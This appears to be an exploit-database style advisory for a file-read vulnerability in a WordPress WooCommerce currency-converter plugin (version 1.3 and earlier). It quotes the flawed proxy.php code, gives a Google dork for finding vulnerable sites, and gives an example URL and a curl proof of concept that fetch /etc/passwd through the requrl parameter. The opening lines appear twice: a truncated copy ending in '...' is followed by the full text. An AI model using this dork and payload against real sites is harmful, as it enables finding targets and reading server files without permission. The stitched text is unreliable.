<p># Wordpress Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read</p><p># Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"</p><p># Date: 10/06/2015</p><p># Software Link:</p><p><a href="https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/" rel="nofollow">https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/</a></p><p># Version: <=1.3</p><p># Tested on: Linux</p><p><br></p><hr><p> Description:</p><p> proxy.php's code:</p><pre class="lang-php" data-lang="php"> <?php$file = file_get_contents($_GET['requrl']);$left=strpos($file,'<div id=currency_converter_result>');$right=strlen($file)-strpos($file,'<input type=hidden name=meta');$snip= substr($file,$left,$right);echo $snip;?></pre><p>Based on user input, the content of a file is printed out (unfortunately</p><p>not included) so any html file can be loaded, and an attacker may be able</p><p>to read any...
<p># Wordpress Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read</p><p># Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"</p><p># Date: 10/06/2015</p><p># Software Link:</p><p><a href="https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/" rel="nofollow">https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/</a></p><p># Version: <=1.3</p><p># Tested on: Linux</p><p><br></p><hr><p> Description:</p><p> proxy.php's code:</p><pre class="lang-php" data-lang="php"> <?php$file = file_get_contents($_GET['requrl']);$left=strpos($file,'<div id=currency_converter_result>');$right=strlen($file)-strpos($file,'<input type=hidden name=meta');$snip= substr($file,$left,$right);echo $snip;?></pre><p>Based on user input, the content of a file is printed out (unfortunately</p><p>not included) so any html file can be loaded, and an attacker may be able</p><p>to read any local file which</p><p>is not executed in the server.</p><p><br></p><hr><p>Example:</p><pre class="">http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd</pre><p>POC:</p><pre class="">curl --silent --urlhttp://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd</pre>
